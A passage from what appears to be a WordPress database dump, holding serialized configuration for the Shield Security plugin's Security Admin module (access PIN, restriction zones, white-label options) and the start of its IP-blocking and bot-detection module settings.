Restrict access using a simple Access PIN.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:38:\"section_admin_access_restriction_areas\";s:5:\"title\";s:32:\"Security Admin Restriction Zones\";s:11:\"title_short\";s:24:\"Access Restriction Zones\";s:9:\"beacon_id\";i:214;s:7:\"summary\";a:2:{i:0;s:120:\"Purpose - Restricts access to key WordPress areas for all users not authenticated with the Security Admin Access system.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:5:{s:4:\"slug\";s:18:\"section_whitelabel\";s:5:\"title\";s:18:\"Shield White Label\";s:11:\"title_short\";s:11:\"White Label\";s:9:\"beacon_id\";i:131;s:7:\"summary\";a:1:{i:0;s:92:\"Purpose - Rename and re-brand the Shield Security plugin for your client site installations.\";}}i:3;a:5:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:5:\"title\";s:39:\"Enable Module: WordPress Security Admin\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:213;s:7:\"summary\";a:3:{i:0;s:100:\"Purpose - Restricts access to this plugin preventing unauthorized changes to your security settings.\";i:1;s:59:\"Recommendation - Keep the Security Admin feature turned on.\";i:2;s:63:\"You need to also enter a new Access PIN to enable this feature.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{s:31:\"enable_admin_access_restriction\";a:10:{s:3:\"key\";s:31:\"enable_admin_access_restriction\";s:7:\"section\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/40\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf02\";s:4:\"name\";s:21:\"Enable Security Admin\";s:7:\"summary\";s:41:\"Enforce Security Admin Access Restriction\";s:11:\"description\";s:157:\"Enable this with great care and consideration. When this Access PIN option is enabled, you must specify a key below and use it to gain access to this plugin.\";}s:16:\"admin_access_key\";a:11:{s:3:\"key\";s:16:\"admin_access_key\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:9:\"link_info\";s:19:\"https://shsec.io/42\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:215;s:4:\"name\";s:25:\"Security Admin Access PIN\";s:7:\"summary\";s:40:\"Provide/Update Security Admin Access PIN\";s:11:\"description\";s:92:\"Careful: If you forget this, you could potentially lock yourself out from using this plugin.\";}s:15:\"sec_admin_users\";a:13:{s:3:\"key\";s:15:\"sec_admin_users\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/dk\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:132;s:4:\"name\";s:15:\"Security Admins\";s:7:\"summary\";s:26:\"Persistent Security Admins\";s:11:\"description\";s:79:\"All emails, usernames, or user IDs entered here will always be Security Admins.\";}s:20:\"admin_access_timeout\";a:12:{s:3:\"key\";s:20:\"admin_access_timeout\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:7:\"default\";i:30;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:1;s:9:\"link_info\";s:19:\"https://shsec.io/41\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:387;s:4:\"name\";s:22:\"Security Admin Timeout\";s:7:\"summary\";s:63:\"Specify An Automatic Timeout Interval For Security Admin Access\";s:11:\"description\";s:133:\"This will automatically expire your Security Admin Session. Does not apply until you enter the access PIN again. Default: 60 minutes.\";}s:20:\"allow_email_override\";a:11:{s:3:\"key\";s:20:\"allow_email_override\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gf\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:385;s:4:\"name\";s:20:\"Allow Email Override\";s:7:\"summary\";s:49:\"Allow Email Override Of Admin Access Restrictions\";s:11:\"description\";s:96:\"Allow the use of verification emails to override and switch off the Security Admin restrictions.\";}s:29:\"admin_access_restrict_options\";a:10:{s:3:\"key\";s:29:\"admin_access_restrict_options\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf32\";s:9:\"beacon_id\";i:214;s:4:\"name\";s:7:\"Options\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:140:\"Careful: This will restrict access to page/post creation, editing and deletion. Note: Selecting \'Edit\' will also restrict all other options.\";}s:33:\"admin_access_restrict_admin_users\";a:11:{s:3:\"key\";s:33:\"admin_access_restrict_admin_users\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:214;s:4:\"name\";s:11:\"Admin Users\";s:7:\"summary\";s:57:\"Restrict Access To Create/Delete/Modify Other Admin Users\";s:11:\"description\";s:127:\"Careful: This will restrict the ability of WordPress administrators from creating, modifying or promoting other administrators.\";}s:29:\"admin_access_restrict_plugins\";a:11:{s:3:\"key\";s:29:\"admin_access_restrict_plugins\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:16:\"activate_plugins\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:15:\"install_plugins\";s:4:\"text\";s:7:\"Install\";}i:2;a:2:{s:9:\"value_key\";s:14:\"update_plugins\";s:4:\"text\";s:6:\"Update\";}i:3;a:2:{s:9:\"value_key\";s:14:\"delete_plugins\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:47:\"Restrict Access To Key WordPress Plugin Actions\";s:11:\"description\";s:156:\"Careful: This will restrict access to plugin installation, update, activation and deletion. Note: Selecting \'Activate\' will also restrict all other options.\";}s:28:\"admin_access_restrict_themes\";a:11:{s:3:\"key\";s:28:\"admin_access_restrict_themes\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:13:\"switch_themes\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:18:\"edit_theme_options\";s:4:\"text\";s:18:\"Edit Theme Options\";}i:2;a:2:{s:9:\"value_key\";s:14:\"install_themes\";s:4:\"text\";s:7:\"Install\";}i:3;a:2:{s:9:\"value_key\";s:13:\"update_themes\";s:4:\"text\";s:6:\"Update\";}i:4;a:2:{s:9:\"value_key\";s:13:\"delete_themes\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:42:\"Restrict Access To WordPress Theme Actions\";s:11:\"description\";s:90:\"Careful: This will restrict access to theme installation, update, activation and deletion.\";}s:27:\"admin_access_restrict_posts\";a:11:{s:3:\"key\";s:27:\"admin_access_restrict_posts\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"edit\";s:4:\"text\";s:11:\"Create/Edit\";}i:1;a:2:{s:9:\"value_key\";s:7:\"publish\";s:4:\"text\";s:7:\"Publish\";}i:2;a:2:{s:9:\"value_key\";s:6:\"delete\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:79:\"Careful: This will restrict access to page/post creation, editing and deletion.\";}s:17:\"whitelabel_enable\";a:11:{s:3:\"key\";s:17:\"whitelabel_enable\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dr\";s:9:\"link_blog\";s:19:\"https://shsec.io/ds\";s:9:\"beacon_id\";i:131;s:4:\"name\";s:18:\"Enable White Label\";s:7:\"summary\";s:34:\"Activate Your White Label Settings\";s:11:\"description\";s:61:\"Use this option to turn on/off the whole White Label feature.\";}s:15:\"wl_hide_updates\";a:9:{s:3:\"key\";s:15:\"wl_hide_updates\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Hide Updates\";s:7:\"summary\";s:47:\"Hide Available Updates From Non Security Admins\";s:11:\"description\";s:66:\"Hides the availability of Shield updates from non-security admins.\";}s:20:\"wl_replace_badge_url\";a:9:{s:3:\"key\";s:20:\"wl_replace_badge_url\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Replace Plugin Badge\";s:7:\"summary\";s:35:\"Replace Plugin Badge URL and Images\";s:11:\"description\";s:84:\"When using the plugin badge, replace the URL and link with your Whitelabel settings.\";}s:17:\"wl_pluginnamemain\";a:11:{s:3:\"key\";s:17:\"wl_pluginnamemain\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:6:\"Shield\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:11:\"Plugin Name\";s:7:\"summary\";s:22:\"The Name Of The Plugin\";s:11:\"description\";s:23:\"The Name Of The Plugin.\";}s:11:\"wl_namemenu\";a:10:{s:3:\"key\";s:11:\"wl_namemenu\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:15:\"Shield Security\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Menu Title\";s:7:\"summary\";s:33:\"The Main Menu Title Of The Plugin\";s:11:\"description\";s:79:\"The Main Menu Title Of The Plugin. If left empty, the Plugin Name will be used.\";}s:14:\"wl_companyname\";a:11:{s:3:\"key\";s:14:\"wl_companyname\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"Example Company Name\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:12:\"Company Name\";s:7:\"summary\";s:24:\"The Name Of Your Company\";s:11:\"description\";s:33:\"Provide the name of your company.\";}s:14:\"wl_description\";a:10:{s:3:\"key\";s:14:\"wl_description\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:74:\"Secure Your Sites With The World\'s Most Powerful WordPress Security Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Plugin Tag Line\";s:7:\"summary\";s:26:\"The Tag Line Of The Plugin\";s:11:\"description\";s:27:\"The Tag Line Of The Plugin.\";}s:10:\"wl_homeurl\";a:10:{s:3:\"key\";s:10:\"wl_homeurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:19:\"https://shsec.io/7f\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"Home URL\";s:7:\"summary\";s:20:\"Plugin Home Page URL\";s:11:\"description\";s:84:\"When a user clicks the home link for this plugin, this is where they\'ll be directed.\";}s:14:\"wl_menuiconurl\";a:11:{s:3:\"key\";s:14:\"wl_menuiconurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"pluginlogo_16x16.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:9:\"Menu Icon\";s:7:\"summary\";s:13:\"Menu Icon URL\";s:11:\"description\";s:42:\"The URL of the icon displayed in the menu.\";}s:19:\"wl_dashboardlogourl\";a:11:{s:3:\"key\";s:19:\"wl_dashboardlogourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:22:\"pluginlogo_128x128.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:17:\"Plugin Badge Logo\";s:7:\"summary\";s:21:\"Plugin Badge Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}s:19:\"wl_login2fa_logourl\";a:10:{s:3:\"key\";s:19:\"wl_login2fa_logourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:29:\"pluginlogo_banner-772x250.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Dashboard and 2FA Logo\";s:7:\"summary\";s:26:\"Dashboard and 2FA Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}}s:11:\"definitions\";a:3:{s:22:\"restricted_pages_users\";a:2:{i:0;s:13:\"user-edit.php\";i:1;s:9:\"users.php\";}s:6:\"events\";a:2:{s:11:\"key_success\";a:2:{s:5:\"level\";s:5:\"debug\";s:6:\"recent\";b:1;}s:8:\"key_fail\";a:3:{s:5:\"level\";s:7:\"warning\";s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}s:19:\"options_to_restrict\";a:4:{s:12:\"wpms_options\";a:3:{i:0;s:11:\"admin_email\";i:1;s:9:\"site_name\";i:2;s:12:\"registration\";}s:10:\"wpms_pages\";a:1:{i:0;s:12:\"settings.php\";}s:10:\"wp_options\";a:10:{i:0;s:8:\"blogname\";i:1;s:15:\"blogdescription\";i:2;s:7:\"siteurl\";i:3;s:4:\"home\";i:4;s:11:\"admin_email\";i:5;s:15:\"new_admin_email\";i:6;s:18:\"users_can_register\";i:7;s:15:\"comments_notify\";i:8;s:18:\"comment_moderation\";i:9;s:11:\"blog_public\";}s:8:\"wp_pages\";a:4:{i:0;s:19:\"options-general.php\";i:1;s:22:\"options-discussion.php\";i:2;s:19:\"options-reading.php\";i:3;s:11:\"options.php\";}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510336,'_site_transient_timeout_shield_mod_config_ips','1632920474','no'),(510337,'_site_transient_shield_mod_config_ips','a:10:{s:4:\"slug\";s:3:\"ips\";s:10:\"properties\";a:14:{s:4:\"slug\";s:3:\"ips\";s:4:\"name\";s:22:\"Block Bad IPs/Visitors\";s:12:\"sidebar_name\";s:11:\"IP Blocking\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:3:\"ips\";s:7:\"tagline\";s:68:\"Automatically detect bots and malicious visitors and stop them dead.\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:100;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:10:\"IP Manager\";s:4:\"slug\";s:12:\"ips-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:12:\"ips-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:3:\"ips\";}}}s:13:\"admin_notices\";a:1:{s:19:\"visitor-whitelisted\";a:5:{s:2:\"id\";s:19:\"visitor-whitelisted\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:8:\"per_user\";b:1;s:4:\"type\";s:4:\"info\";}}s:12:\"requirements\";a:1:{s:3:\"php\";a:2:{s:9:\"functions\";a:1:{i:0;s:10:\"filter_var\";}s:9:\"constants\";a:5:{i:0;s:18:\"FILTER_VALIDATE_IP\";i:1;s:16:\"FILTER_FLAG_IPV4\";i:2;s:16:\"FILTER_FLAG_IPV6\";i:3;s:25:\"FILTER_FLAG_NO_PRIV_RANGE\";i:4;s:24:\"FILTER_FLAG_NO_RES_RANGE\";}}}s:8:\"sections\";a:8:{i:0;a:6:{s:4:\"slug\";s:23:\"section_auto_black_list\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Automatic IP Black List\";s:11:\"title_short\";s:22:\"Auto IP Blocking Rules\";s:9:\"beacon_id\";i:208;s:7:\"summary\";a:2:{i:0;s:136:\"Purpose - The Automatic IP Black List system will block the IP addresses of naughty visitors after a specified number of transgressions.\";i:1;s:68:\"Recommendation - Keep the Automatic IP Black List feature turned on.\";}}i:1;a:3:{s:4:\"slug\";s:15:\"section_antibot\";s:5:\"title\";s:14:\"AntiBot System\";s:11:\"title_short\";s:14:\"AntiBot System\";}i:2;a:5:{s:4:\"slug\";s:14:\"section_logins\";s:5:\"title\";s:18:\"Capture Login Bots\";s:11:\"title_short\";s:10:\"Login Bots\";s:9:\"beacon_id\";i:122;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:3;a:5:{s:4:\"slug\";s:14:\"section_probes\";s:5:\"title\";s:20:\"Capture Probing Bots\";s:11:\"title_short\";s:12:\"Probing Bots\";s:9:\"beacon_id\";i:123;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:4;a:5:{s:4:\"slug\";s:18:\"section_behaviours\";s:5:\"title\";s:30:\"Identify Common Bot Behaviours\";s:11:\"title_short\";s:14:\"Bot Behaviours\";s:9:\"beacon_id\";i:124;s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:5;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:6;a:4:{s:4:\"slug\";s:33:\"section_enable_plugin_feature_ips\";s:5:\"title\";s:25:\"Enable Module: IP Manager\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:95:\"Purpose - The IP Manager allows you to whitelist, blacklist and configure auto-blacklist rules.\";i:1;s:123:\"Recommendation - Keep the IP Manager feature turned on. You should also carefully review the automatic black list settings.\";}}i:7;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{s:10:\"enable_ips\";a:11:{s:3:\"key\";s:10:\"enable_ips\";s:7:\"section\";s:33:\"section_enable_plugin_feature_ips\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ea\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:208;s:4:\"name\";s:17:\"Enable IP Manager\";s:7:\"summary\";s:41:\"Enable (or Disable) The IP Manager module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the IP Manager module\";}s:15:\"antibot_minimum\";a:12:{s:3:\"key\";s:15:\"antibot_minimum\";s:7:\"section\";s:15:\"section_antibot\";s:7:\"default\";i:45;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:0;s:3:\"max\";i:99;s:9:\"link_info\";s:19:\"https://shsec.io/jy\";s:9:\"link_blog\";s:19:\"https://shsec.io/jz\";s:9:\"beacon_id\";i:424;s:4:\"name\";s:17:\"AntiBot Threshold\";s:7:\"summary\";s:38:\"AntiBot Testing Threshold (Percentage)\";s:11:\"description\";s:94:\"When using Shield\'s AntiBot system, this is the threshold used for testing (between 1 and 99).\";}s:31:\"antibot_high_reputation_minimum\";a:11:{s:3:\"key\";s:31:\"antibot_high_reputation_minimum\";s:7:\"section\";s:15:\"section_antibot\";s:7:\"default\";i:200;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/jy\";s:9:\"link_blog\";s:19:\"https://shsec.io/jz\";s:9:\"beacon_id\";i:431;s:4:\"name\";s:22:\"High Reputation Bypass\";s:7:\"summary\";s:67:\"Prevent IPs/Visitors With High Reputation Scores From Being Blocked\";s:11:\"description\";s:73:\"Ensures that visitors with a high reputation are never blocked by Shield.\";}s:12:\"force_notbot\";a:11:{s:3:\"key\";s:12:\"force_notbot\";s:7:\"section\";s:15:\"section_antibot\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/jy\";s:9:\"link_blog\";s:19:\"https://shsec.io/jz\";s:9:\"beacon_id\";i:448;s:4:\"name\";s:15:\"Force NotBot JS\";s:7:\"summary\";s:26:\"Force Loading Of NotBot JS\";s:11:\"description\";s:114:\"Use this option if you\'re using an aggressive caching plugin or system to ensure NotBot JS is loaded for visitors.\";}s:19:\"transgression_limit\";a:10:{s:3:\"key\";s:19:\"transgression_limit\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf24\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:207;s:4:\"name\";s:13:\"Offense Limit\";s:7:\"summary\";s:72:\"Visitor IP address will be Black Listed after X bad actions on your site\";s:11:\"description\";s:280:\"A black mark is set against an IP address each time a visitor trips the defenses of the Shield plugin. When the number of these offenses exceeds specified limit, they are automatically blocked from accessing the site. Set this to 0 to turn off the Automatic IP Black List feature.\";}s:11:\"auto_expire\";a:12:{s:3:\"key\";s:11:\"auto_expire\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"default\";s:3:\"day\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"minute\";s:4:\"text\";s:6:\"Minute\";}i:1;a:2:{s:9:\"value_key\";s:4:\"hour\";s:4:\"text\";s:4:\"Hour\";}i:2;a:2:{s:9:\"value_key\";s:3:\"day\";s:4:\"text\";s:3:\"Day\";}i:3;a:2:{s:9:\"value_key\";s:4:\"week\";s:4:\"text\";s:4:\"Week\";}i:4;a:2:{s:9:\"value_key\";s:5:\"month\";s:4:\"text\";s:5:\"Month\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf25\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:9:\"beacon_id\";i:210;s:4:\"name\";s:21:\"Auto Block Expiration\";s:7:\"summary\";s:65:\"After 1 \'X\' a black listed IP will be removed from the black list\";s:11:\"description\";s:249:\"Permanent and lengthy IP Black Lists are harmful to performance. You should allow IP addresses on the black list to be eventually removed over time. Shorter IP black lists are more efficient and a more intelligent use of an IP-based blocking system.\";}s:17:\"user_auto_recover\";a:13:{s:3:\"key\";s:17:\"user_auto_recover\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:15:\"multiple_select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:4:\"gasp\";s:4:\"text\";s:26:\"With Shield Bot Protection\";}i:1;a:2:{s:9:\"value_key\";s:5:\"email\";s:4:\"text\";s:44:\"Magic Email Links To Unblock Logged-In Users\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f8\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:125;s:4:\"name\";s:17:\"User Auto Unblock\";s:7:\"summary\";s:34:\"Allow Visitors To Unblock Their IP\";s:11:\"description\";s:73:\"Allow visitors blocked by the plugin to automatically unblock themselves.\";}s:17:\"request_whitelist\";a:12:{s:3:\"key\";s:17:\"request_whitelist\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/gd\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:126;s:4:\"name\";s:22:\"Request Path Whitelist\";s:7:\"summary\";s:22:\"Request Path Whitelist\";s:11:\"description\";s:23:\"Request Path Whitelist.\";}s:16:\"text_loginfailed\";a:12:{s:3:\"key\";s:16:\"text_loginfailed\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e8\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:139;s:4:\"name\";s:12:\"Login Failed\";s:7:\"summary\";s:62:\"Visitor Triggers The IP Offenses System Through A Failed Login\";s:11:\"description\";s:63:\"This message is displayed if the visitor fails a login attempt.\";}s:9:\"track_404\";a:12:{s:3:\"key\";s:9:\"track_404\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:10:\"404 Detect\";s:7:\"summary\";s:33:\"Identify A Bot When It Hits A 404\";s:11:\"description\";s:53:\"Detect When A Visitor Browses To A Non-Existent Page.\";}s:16:\"track_linkcheese\";a:12:{s:3:\"key\";s:16:\"track_linkcheese\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f6\";s:9:\"beacon_id\";i:123;s:4:\"name\";s:11:\"Link Cheese\";s:7:\"summary\";s:38:\"Tempt A Bot With A Fake Link To Follow\";s:11:\"description\";s:45:\"Detect A Bot That Follows A \'no-follow\' 